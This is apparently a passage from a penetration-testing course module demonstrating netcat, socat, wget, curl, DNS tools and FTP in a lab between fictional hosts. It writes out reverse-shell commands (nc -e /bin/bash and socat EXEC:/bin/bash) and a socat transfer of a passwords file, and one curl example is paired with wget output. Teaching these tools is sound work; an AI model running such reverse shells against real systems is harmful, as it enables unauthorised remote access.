Now, Alice can send a reverse shell from her Linux machine to Bob. Once again, we use the -e option to make an application available remotely, which in this case happens to be /bin/bash, the Linux shell:

$ ip address show eth0 | grep inet
          inet 10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0
          
$ nc -nv 10.11.0.22 4444 -e /bin/bash
(UNKNOWN) [10.11.0.22] 4444 (?) open

Once the connection is established, Alice's Netcat will have redirected /bin/bash input, output, and error data streams to Bob's machine on port 4444, and Bob can interact with that shell:

C:\Users\offsec>nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43482

ip address show eth0 | grep inet
          inet 10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0

Socat

Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.

While there are a multitude of things that socat can do, we will only cover a few of them to illustrate its use. Let's begin exploring socat and see how it compares to Netcat.

Netcat vs Socat

First, let's connect to a remote server on port 80 using both Netcat and socat:

$ nc <remote server's ip address> 80

$ socat - TCP4:<remote server's ip address>:80

Note that the syntax is similar, but socat requires the - to transfer data between STDIO and the remote host (allowing our keyboard interaction with the shell) and protocol (TCP4). The protocol, options, and port number are colon-delimited.

Because root privileges are required to bind a listener to ports below 1024, we need to use sudo when starting a listener on port 443:

$ sudo nc -lvp localhost 443

$ sudo socat TCP4-LISTEN:443 STDOUT

Notice the required addition of both the protocol for the listener (TCP4-LISTEN) and the STDOUT argument, which redirects standard output.

Socat File Transfers

Next, we will try out file transfers. Continuing with the previous fictional characters of Alice and Bob, assume Alice needs to send Bob a file called secret_passwords.txt. As a reminder, Alice's host machine is running on Linux, and Bob's is running Windows. Let's see this in action.

On Alice's side, we will share the file on port 443. In this example, the TCP4-LISTEN option specifies an IPv4 listener, fork creates a child process once a connection is made to the listener, which allows multiple connections, and file: specifies the name of a file to be transferred:

$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

On Bob's side, we will connect to Alice's computer and retrieve the file. In this example, the TCP4 option specifies IPv4, followed by Alice's IP address (10.11.0.4) and listening port number (443), file: specifies the local file name to save the file to on Bob's computer, and create specifies that a new file will be created:

C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create

C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"

Socat Reverse Shells

Let's take a look at a reverse shell using socat. First, Bob will start a listener on port 443. To do this, he will supply the -d -d option to increase verbosity (showing fatal, error, warning, and notice messages), TCP4-LISTEN:443 to create an IPv4 listener on port 443, and STDOUT to connect standard output (STDOUT) to the TCP socket:

C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[4388] N listening on AF=2 0.0.0.0:443

Next, Alice will use socat's EXEC option (similar to the Netcat -e option), which will execute the given program once a remote connection is established. In this case, Alice will send a /bin/bash reverse shell (with EXEC:/bin/bash) to Bob's listening socket on 10.11.0.22:443:

$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash

Once connected, Bob can enter commands from his socat session, which will execute on Alice's machine.

... socat[4388] N accepting connection from AF=2 10.11.0.4:54720 on 10.11.0.22:443
... socat[4388] N using stdout for reading and writing
... socat[4388] N starting data transfer loop with FDs [4,4] and [1,1]
whoami
kali
id
uid=1000(kali) gid=1000(kali) groups=1000(kali)

HTTP (wget, curl)

wget is a very useful utility to download files from a web server. wget is derived from World Wide Web and 'get.' Typing 'wget' in the Linux terminal will display the usage for the utility.

$ wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.

To get an idea of how to use wget, let's download the syllabus for the course after this (PEN-200). The PDF is located at https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf. In the Linux Terminal, we'll enter the following.

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
--2021-06-30 06:27:55--  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Resolving www.offensive-security.com (www.offensive-security.com)... 192.124.249.5
Connecting to www.offensive-security.com (www.offensive-security.com)|192.124.249.5|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676301 (660K) [application/pdf]
Saving to: ‘penetration-testing-with-kali.pdf’

penetration-testing-with-kali.pdf                       100%[============================================================================================================================>] 660.45K   743KB/s    in 0.9s    

2021-06-30 06:27:56 (743 KB/s) - ‘penetration-testing-with-kali.pdf’ saved [676301/676301]

$ ls
Desktop  Documents  Downloads  Music  penetration-testing-with-kali.pdf  Pictures  Public  Templates  Videos

Next, we will cover is how to rename the downloaded file. This can be done with the '-O' option. This is a capital 'o.' The lowercase 'o' option will log the the messages displayed on the terminal to the file specified. The two options will be demonstrated.

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf -O PEN-200-Syllabus.pdf
--2021-06-30 06:59:31--  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Resolving www.offensive-security.com (www.offensive-security.com)... 192.124.249.5
Connecting to www.offensive-security.com (www.offensive-security.com)|192.124.249.5|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676301 (660K) [application/pdf]
Saving to: ‘PEN-200-Syllabus.pdf’

PEN-200-Syllabus.pdf                                    100%[============================================================================================================================>] 660.45K  2.31MB/s    in 0.3s    

2021-06-30 06:59:32 (2.31 MB/s) - ‘PEN-200-Syllabus.pdf’ saved [676301/676301]

$ ls
Desktop  Documents  Downloads  Music  PEN-200-Syllabus.pdf  penetration-testing-with-kali.pdf  Pictures  Public  Templates  Videos

$ file PEN-200-Syllabus.pdf
PEN-200-Syllabus.pdf: PDF document, version 1.5

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf -o log

$ file log
log: UTF-8 Unicode text

$ cat log
--2021-06-30 07:02:17--  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Resolving www.offensive-security.com (www.offensive-security.com)... 192.124.249.5
Connecting to www.offensive-security.com (www.offensive-security.com)|192.124.249.5|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676301 (660K) [application/pdf]
Saving to: ‘penetration-testing-with-kali.pdf.1’

     0K .......... .......... .......... .......... ..........  7%  842K 1s
    50K .......... .......... .......... .......... .......... 15%  966K 1s
   100K .......... .......... .......... .......... .......... 22%  168M 0s
   150K .......... .......... .......... .......... .......... 30% 3.04M 0s
   200K .......... .......... .......... .......... .......... 37% 2.55M 0s
   250K .......... .......... .......... .......... .......... 45% 1.13M 0s
   300K .......... .......... .......... .......... .......... 52% 3.04M 0s
   350K .......... .......... .......... .......... .......... 60% 1.53M 0s
   400K .......... .......... .......... .......... .......... 68% 1.62M 0s
   450K .......... .......... .......... .......... .......... 75%  891K 0s
   500K .......... .......... .......... .......... .......... 83% 4.03M 0s
   550K .......... .......... .......... .......... .......... 90% 3.01M 0s
   600K .......... .......... .......... .......... .......... 98% 1.50M 0s
   650K ..........                                            100% 7.17M=0.4s

2021-06-30 07:02:17 (1.67 MB/s) - ‘penetration-testing-with-kali.pdf.1’ saved [676301/676301]

$ ls
Desktop  Documents  Downloads  log  Music  PEN-200-Syllabus.pdf  penetration-testing-with-kali.pdf  penetration-testing-with-kali.pdf.1  Pictures  Public  Templates  Videos
The last thing we'll cover with wget is the '--recursive' option. This is great when the goal is to rebuild a website or copy an entire website into your host. Be careful when doing this, as some websites contain a lot of data and will fill up your hard drive when pulling it all in. In the following example, I execute wget with the '--recursive' option on https://www.kali.org/. I stopped the website copy by pressing +C, after giving it a bit of time to demonstrate what this looks like after the process is completed.
$ curl --recursive https://www.kali.org/
--2021-07-01 11:42:15--  https://www.kali.org/
Resolving www.kali.org (www.kali.org)... 35.185.44.232
Connecting to www.kali.org (www.kali.org)|35.185.44.232|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35937 (35K) [text/html]
Saving to: ‘www.kali.org/index.html’

www.kali.org/index.html                                 100%[============================================================================================================================>]  35.09K  --.-KB/s    in 0.09s   

2021-07-01 11:42:15 (381 KB/s) - ‘www.kali.org/index.html’ saved [35937/35937]

Loading robots.txt; please ignore errors.
--2021-07-01 11:42:15--  https://www.kali.org/robots.txt
Reusing existing connection to www.kali.org:443.
HTTP request sent, awaiting response... 200 OK
Length: 103 [text/plain]
Saving to: ‘www.kali.org/robots.txt’

www.kali.org/robots.txt                                 100%[============================================================================================================================>]     103  --.-KB/s    in 0s      

2021-07-01 11:42:15 (224 MB/s) - ‘www.kali.org/robots.txt’ saved [103/103]

---
Output trimmed

When this process is completed, the website can be searched within the current directory. Let's list the downloaded content in the terminal.

$ ls
Desktop  Documents  Downloads  Music  PEN-200-Syllabus.pdf  Pictures  Public  Templates  Videos  www.kali.org

$ ls www.kali.org
about-us  community  css   downloads  get-kali         images      index.min.css  kali-nethunter  partnerships-sponsorships  releases    rss.xml        sitemap.xml
blog      contact    docs  features   get-kali.min.js  index.html  index.min.js   newsletter      plugins                    robots.txt  script.min.js  style.min.css

wget neatly organizes the downloaded content in the same structure as the website. This may be a useful activity for a security professional to search an entire website for things like cleartext credentials, databases, uncontrolled directories, etc.

Another client we can use to copy files from servers is cURL. The name stands for "Client URL." curl is extremely powerful in that it includes an incredible amount of options that can be added to manipulate the request to the server. We'll cover the following options: --silent (don't show progress meter or error message), -o (output file), -k (suppresses certificate errors), and -x (using a proxy). Before we begin with the options, let's take a look at the most basic usage. The previous files that were downloaded with wget were removed before these exercises.

$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

$ curl https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

In the output above, the most basic execution of curl did not work. This is because we were attempting to download a PDF file, which doesn't render the same as a webpage or plaintext content. Let's follow the advice from the error message and add the output option (-o) with a name for the file.

$ curl https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf -o PEN-200-Syllabus.pdf
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  660k  100  660k    0     0   436k      0  0:00:01  0:00:01 --:--:--  435k
 
$  file PEN-200-Syllabus.pdf
PEN-200-Syllabus.pdf: PDF document, version 1.5

We followed the advice of the output error and added an output option (-o) to give the downloaded file a name. This file was then downloaded and can be verified as a PDF, using the 'file' command. Let's take another look at the basic usage of curl, but this time on a webpage and not a file.

$ curl https://kali.org/
<!doctype html><html lang=en-us><head itemscope itemtype=https://www.kali.org/><meta charset=utf-8><meta name=viewport content="width=device-width"><title itemprop=name>Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution</title><meta itemprop=name content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta name=application-name content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta name=twitter:title content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta property="og:site_name" content="Kali Linux"><meta property="og:title" content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta itemprop=description content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta name=description content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta name=twitter:description content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta property="og:description" content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta name=keywords content="kali,linux,kalilinux,Penetration,Testing,Penetration Testing,Distribution,Advanced"><meta name=apple-mobile-web-app-status-bar-style content="black-translucent"><meta name=msapplication-navbutton-color content="#367BF0"><meta name=theme-color content="#367BF0"><meta name=language content="English"><meta property="og:locale" content="en_US"><meta itemprop=image content="https://www.kali.org//images/kali-logo.svg"><meta name=twitter:image content="https://www.kali.org//images/kali-logo.svg"><meta name=twitter:image:src content="https://www.kali.org//images/kali-logo.svg"><meta property="og:image" content="https://www.kali.org//images/kali-logo.svg"><meta property="og:updated_time" content="2021-06-29T00:00:00Z"><meta name=twitter:site content="@kalilinux"><meta name=twitter:creator content="@kalilinux"><link rel="alternate icon" class=js-site-favicon type=image/png href=https://www.kali.org/images/favicon.png><link rel=icon class=js-site-favicon type=image/svg+xml href=https://www.kali.org/images/favicon.svg><base href=https://www.kali.org/><link rel=canonical href=https://www.kali.org/ itemprop=url><meta name=twitter:url content="https://www.kali.org/"><meta name=url content="https://www.kali.org/"><meta property="og:url" content="https://www.kali.org/"><link rel=sitemap type=application/xml title=Sitemap href=https://www.kali.org/sitemap.xml><link href=https://www.kali.org/rss.xml type=application/rss+xml title="Kali Linux" rel=alternate><link href=https://www.kali.org/rss.xml type=application/rss+xml title="Kali Linux" rel=feed><link href=https://www.kali.org/style.min.css rel=stylesheet><style>:root{--primary-color:#367BF0;--body-color:#f9f9f9;--text-color:#636363;--text-color-dark:#242738;--white-color:#ffffff;--light-color:#f8f9fa;--font-family:Noto Sans}body.dark-theme{--body-color:black;--text-color:#e1e1e1;--text-color-dark:white;--white-color:#121212;--light-color:#1A1A1A}</style><script>const $=document.querySelector.bind(document),$=document.querySelectorAll.bind(document)</script></head><body><header class=bg-cover><nav class=container><a id=logo href=https://www.kali.org/ style=background-image:url(https://www.kali.org//images/kali-logo.svg)></a><ul id=navigation><li><a href=/get-kali/>Get Kali</a></li><li><a href=/blog/>Blog</a></li><li class=dropdown-menu><span>Documentation <i class=ti-angle-down></i></span><div><a href=/docs/>Kali Linux Documentation</a>
<a href=https://tools.kali.org/>Kali Tools Documentation</a>
---
Output trimmed 

Let's now look at another site example that will give an error message with the same syntax of curl.

$ curl https://www.offensive-seucrity.com/
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

Strangely, the same error appears again. Let's take a look at why this may be happening by looking at the HTTP Headers with the '-I' option.

$ curl https://www.offensive-security.com/ -I
HTTP/2 200 
server: nginx
date: Wed, 30 Jun 2021 17:57:02 GMT
content-type: text/html; charset=UTF-8
content-length: 14859
x-sucuri-id: 11005
x-xss-protection: 1; mode=block
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubdomains; preload
content-security-policy: upgrade-insecure-requests;
link: <https://www.offensive-security.com/>; rel=shortlink
vary: Accept-Encoding,User-Agent
content-encoding: gzip
x-sucuri-cache: HIT

The reason the error is still showing the page as a binary is due to the content-encoding header from the web server. Note that the encoding is 'gzip.' This means that the page is sending a compressed zip file as the delivery method to the browswer. This also registers as a binary. When presented with these types of errors, referring to the manpage3 or Google-ing the error message can be incredibly useful. For now, we'll just tell you that the option to use to overcome the error is '--compressed.' Web headers and the way websites work will be further covered in the "Web" section of this course. Let's execute the curl command again with the appropriate option for this site.

In line with the subject of erroneous output, in many lab settings, web certificate errors come up. To suppress these errors and continue, the '-k' option can be used. Outside of labs, it is not recommended to use this option, unless it is known that the web server is trusted. For the next demonstration, https://self-signed.badssl.com/ will be used to exhibit the error and overcoming the error with this option.

$ curl https://self-signed.badssl.com/
curl: (60) SSL certificate problem: self signed certificate
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

When we add the '-k' option, the SSL error will be ignored and the page can be retrieved.

$ curl https://self-signed.badssl.com/ -k
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="/icons/favicon-red.ico"/>
  <link rel="apple-touch-icon" href="/icons/icon-red.png"/>
  <title>self-signed.badssl.com</title>
  <link rel="stylesheet" href="/style.css">
  <style>body { background: red; }</style>
</head>
<body>
<div id="content">
  <h1 style="font-size: 12vw;">
    self-signed.badssl.com
  </h1>
</div>

</body>
</html>

Curl can also leverage a proxy before pulling the content from a web page by adding the '-x' option. The syntax for this is as follows.

curl -x [protocol://]host[:port] URL

The system in this demonstration is taken from VulnHub4, and is called "SickOS: 1.15." The goal in this demonstration is not to cover the exploitation of this vulnerable machine or the tools that are involved, but to exhibit the use of a proxy on the system to read web content with curl. SickOs: 1.1 has the IP address of 192.168.56.4 on my system.

$ nmap -A -p- 192.168.56.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 10:22 MST
Nmap scan report for 192.168.56.4
Host is up (0.00064s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 08:00:27:C0:19:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.56.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.44 seconds

Again, don't worry about the details of this nmap scan. What is important for us, from this output, is the port 3128. On 3128, a HTTP proxy (Squid) is displayed. Let's try to connect to the standard port 80 with curl. Note that port 80 isn't shown in the nmap output above. This is purely a demonstration as to what the proxy does when used.

$ curl http://192.168.56.4/
curl: (28) Failed to connect to 192.168.56.4 port 80: Connection timed out

Now, let's try to leverage the internal proxy on the system and curl the same webpage.

$ curl -x http://192.168.56.4:3128/ http://192.168.56.4/
<h1>
BLEHHH!!!
</h1>

The page now resolves, and we can clearly see that the OS is sick.

DNS (host, dig, nslookup)

The Domain Name System (DNS) is one of the most critical systems on the Internet and is a distributed database responsible for translating user-friendly domain names into IP addresses.

This is facilitated by a hierarchical structure that is divided into several zones, starting with the top-level root zone. Let's take a closer look at the process and servers involved in resolving a hostname like www.megacorpone.com.

The process starts when a hostname is entered into a browser or other application. The browser passes the hostname to the operating system's DNS client and the operating system then forwards the request to the external DNS server it is configured to use. This first server in the chain is known as the DNS recursor and is responsible for interacting with the DNS infrastructure and returning the results to the DNS client. The DNS recursor contacts one of the servers in the DNS root zone. The root server then responds with the address of the server responsible for the zone containing the Top Level Domain (TLD), in this case, the .com TLD.

Once the DNS recursor receives the address of the TLD DNS server, it queries it for the address of the authoritative nameserver for the megacorpone.com domain. The authoritative nameserver is the final step in the DNS lookup process and contains the DNS records in a local database known as the zone file. It typically hosts two zones for each domain, the forward lookup zone that is used to find the IP address of a specific hostname and the reverse lookup zone (if configured by the administrator), which is used to find the hostname of a specific IP address. Once the DNS recursor provides the DNS client with the IP address for www.megacorpone.com, the browser can contact the correct web server at its IP address and load the webpage.

To improve the performance and reliability of DNS, DNS caching is used to store local copies of DNS records at various stages of the lookup process. That is why some modern applications, such as web browsers, keep a separate DNS cache. In addition, the local DNS client of the operating system also maintains its own DNS cache along with each of the DNS servers in the lookup process. Domain owners can also control how long a server or client caches a DNS record via the Time To Live (TTL) field of a DNS record.

Interacting with a DNS Server

Each domain can use different types of DNS records. Some of the most common types of DNS records include:

Due to the wealth of information contained within DNS, it is often a lucrative target for active information gathering.

To demonstrate this, we'll use the host command to find the IP address of www.megacorpone.com:

$ host www.megacorpone.com
www.megacorpone.com has address 38.100.193.76

By default, the host command looks for an A record, but we can also query other fields, such as MX or TXT records. To do this, we can use the -t option to specify the type of record we are looking for:

$ host -t mx megacorpone.com
megacorpone.com mail is handled by 10 fb.mail.gandi.net.
megacorpone.com mail is handled by 50 mail.megacorpone.com.
megacorpone.com mail is handled by 60 mail2.megacorpone.com.
megacorpone.com mail is handled by 20 spool.mail.gandi.net.

$ host -t txt megacorpone.com
megacorpone.com descriptive text "Try Harder"

Beyond the use of the host command, nslookup and dig can be used to identify the IP addresses of hosts by their human-readable names. nslookup and dig are very similar tools. Let's cover the basic usage of nslookup.

$ nslookup kali.org
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   kali.org
Address: 35.185.44.232

The above output shows that kali.org has the IP address of 35.185.44.232. Again, your output may be different, if the IP changes from the time of this writing. There is more that can be done with nslookup, but let's move on to dig. dig operates similarly to nslookup, and the basic usage is the same.

$ dig kali.org

; <<>> DiG 9.16.15-Debian <<>> kali.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34693
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1280
;; QUESTION SECTION:
;kali.org.                      IN      A

;; ANSWER SECTION:
kali.org.               300     IN      A       35.185.44.232

;; Query time: 108 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Fri Jul 09 04:29:53 MST 2021
;; MSG SIZE  rcvd: 53

As can be observed in the output above, the host IP for kali.org is 35.185.44.232. Notice that the default search record for both nslookup and dig is the A record. This can be changed by specifying the type in the command line. In dig, this is done with the -t (type) option. Let's look at what mailservers may be used for kali.org.

$ dig -t mx kali.org

; <<>> DiG 9.16.15-Debian <<>> -t mx kali.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5075
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1280
;; QUESTION SECTION:
;kali.org.                      IN      MX

;; ANSWER SECTION:
kali.org.               1800    IN      MX      15 alt2.aspmx.l.google.com.
kali.org.               1800    IN      MX      10 alt1.aspmx.l.google.com.
kali.org.               1800    IN      MX      5 aspmx.l.google.com.
kali.org.               1800    IN      MX      20 alt3.aspmx.l.google.com.
kali.org.               1800    IN      MX      25 alt4.aspmx.l.google.com.

;; Query time: 56 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Fri Jul 09 04:34:46 MST 2021
;; MSG SIZE  rcvd: 155

dig can also specify a DNS server to make the request to. This is done by adding the @ symbol followed by the name or IP of the DNS server. The following demonstrates the request to Google's DNS server to kali.org.

$ dig @8.8.8.8 kali.org

; <<>> DiG 9.16.15-Debian <<>> @8.8.8.8 kali.org
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46201
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;kali.org.                      IN      A

;; ANSWER SECTION:
kali.org.               71      IN      A       35.185.44.232

;; Query time: 40 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Jul 09 04:47:28 MST 2021
;; MSG SIZE  rcvd: 53

FTP (ftp -vn)

FTP (File Transfer Protocol) is one of the oldest protocols used today. It is a very simple protocol to use for file transfers and can be a proven treasure trove for a penetration tester and/or information security professional if the FTP server is misconfigured or the credentials are leaked. There are many instances where sensitive files are in a FTP server that lead to compromise of a system. There are also many instance where a FTP server is used to upload files to a web server directory, which an attacker can leverage to place malicious files on the server.

File Transfers

In the following demonstrations, We have a local FTP server. The setup for this is out-of-scope, as the focus of this section is to gain the familiarity of using the FTP client on already configured FTP servers. Before beginning, let's take a look at two helpful options with the ftp client. -v shows all responses from the FTP server. This can be useful in debugging any connectivity issues. There is also a -n option that prevents an auto-login from happening on the FTP server. If the auto-login feature is enabled, the server will attempt to take the currently used user to log into the server. This disallows specifying a different username and password.

The easiest way to access a FTP server is through anonymous access. This is when the user is anonymous and a password is not needed. Anything can be entered in as the password, and the login will be accepted. This is one of the most insecure configurations, as it allows anyone to log into the FTP server. Let's log in with anonymous access.

$  ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xrwx    2 65534    65534        4096 Jul 09 05:50 pub
226 Directory send OK.
ftp> exit
221 Goodbye.

$

When using the -n option, the initial logging in is a bit different, as it doesn't prompt for the username or password. Let's go through this process to cover this difference in logging in.

$ ftp -nv localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> 

As shown in the listing above, the username and password need to be entered before access is granted to the server. Let's do that now.

$ ftp -nv localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> user anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xrwx    2 65534    65534        4096 Jul 09 05:50 pub
226 Directory send OK.
ftp> exit
221 Goodbye.

There's a directory in the anonymous directory on the server. Let's create a file an upload it to the directory. To do this, let's change our current working directory to /var/tmp and create the file there.

$ cd /var/tmp

kali@kali:/var/tmp$ ls
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-colord.service-nZQIAf        systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-systemd-logind.service-3v6WKg
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-haveged.service-WMdLrh       systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-upower.service-Bh7DTe
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-ModemManager.service-V6U3lg

kali@kali:/var/tmp$ echo "This is a file" > upload.txt

kali@kali:/var/tmp$ cat upload.txt
This is a file

kali@kali:/var/tmp$ ls
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-colord.service-nZQIAf        systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-systemd-logind.service-3v6WKg
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-haveged.service-WMdLrh       systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-upower.service-Bh7DTe
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-ModemManager.service-V6U3lg  upload.txt

kali@kali:/var/tmp$ 

Now that the file is created, we can log back into the FTP server and upload the file with the put command.

kali@kali:/var/tmp$ ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xrwx    2 65534    65534        4096 Jul 09 05:50 pub
226 Directory send OK.
ftp> put upload.txt
local: upload.txt remote: upload.txt
200 EPRT command successful. Consider using EPSV.
553 Could not create file.
ftp>

The file was not uploaded and displayed an error message of 553 Could not create file.. Note the permissions of the pub directory is writeable by everyone. Let's go into that directory and attempt the upload again.

---
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put upload.txt
local: upload.txt remote: upload.txt
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
226 Transfer complete.
15 bytes sent in 0.00 secs (610.3516 kB/s)
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-------    1 137      147            15 Jul 09 06:50 upload.txt
226 Directory send OK.
ftp> exit
221 Goodbye.

Let's log in with a user account to the FTP server. We'll use the kali user to do this.

kali@kali:/var/tmp$ ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): kali
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Desktop
drwxr-xr-x    6 1001     1001         4096 Jul 09 05:17 Documents
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Downloads
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Music
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Pictures
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Public
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Templates
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Videos
-rw-r--r--    1 1001     1001           85 Jul 09 06:56 specialcredentials.txt
226 Directory send OK.
ftp> 

It is important to note that this user account requires the correct password. This is unlike the anonymous account, that could use any or no password. This login shows a user directory, instead of the pub directory. There's an interesting file in this directory too. Let's download the specialcredentials.txt file and take a look at its contents. To download a file from a FTP server, we'll use the get command.

---
ftp> get specialcredentials.txt
local: specialcredentials.txt remote: specialcredentials.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for specialcredentials.txt (85 bytes).
226 Transfer complete.
85 bytes received in 0.00 secs (892.5571 kB/s)
ftp> exit
221 Goodbye.

kali@kali:/var/tmp$ cat specialcredentials.txt
The password to the root account is "password." Surely, no one will ever guess this!

